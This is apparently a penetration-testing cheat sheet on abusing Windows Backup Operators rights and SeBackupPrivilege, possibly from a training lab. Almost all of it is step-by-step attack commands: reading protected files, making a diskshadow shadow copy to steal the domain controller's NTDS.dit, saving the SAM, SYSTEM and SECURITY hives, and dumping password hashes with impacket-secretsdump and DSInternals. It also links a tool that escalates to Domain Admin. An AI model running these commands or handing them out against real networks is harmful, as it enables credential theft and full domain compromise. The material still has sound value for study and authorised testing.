backup-operators

METHOD: 1 - Using seBackupPrivilege (enable privilege)

Import library

Import-Module .\SeBackupPrivilegeUtils.dll

Import-Module .\SeBackupPrivilegeCmdLets.dll

List the privilege

whoami /priv

Enable SeBackupPrivilege

Set-SeBackupPrivilege

Get-SeBackupPrivilege

Access file

dir C:\Confidential\

Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\contract.txt

type .\contract.txt

METHOD: 2 - Attacking a Domain Controller - Copy NTDS.dit

Start tool (GUI)

diskshadow.exe

Create a file of these commands (e.g. backup_sys.txt)

set verbose on 
set metadata C:\Windows\Temp\meta.cab 
set context clientaccessible 
set context persistent 
begin backup 
add volume C: alias cdrive 
create 
expose %cdrive% E: 
end backup 
exit 

                              OR

Run script to take system backup (evil-winrm)

diskshadow /s backup_sys.txt

List system files

dir E:

Copy ntds.dit file

Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit

							OR

robocopy /B E:\Windows\NTDS .\ntds ntds.dit

Backup SAM and SYSTEM registry hives (fix errors)

reg save HKLM\SYSTEM system.save

reg save HKLM\SAM sam.save

Extracting credentials from NTDS.dit

Using impacket-secretsdump

impacket-secretsdump -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

DSInternals.psd1

Import-Module .\DSInternals.psd1
$key = Get-BootKey -SystemHivePath .\SYSTEM
Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $key

METHOD: 3 (local backup)

Copy files

mkdir C:\tmp
reg.exe save hklm\sam C:\tmp\SAM
reg.exe save hklm\system C:\tmp\SYSTEM
reg.exe save hklm\security C:\tmp\SECURITY

Extract hashes

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

METHOD: 4 tool

GitHub - mpgn/BackupOperatorToDA: From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller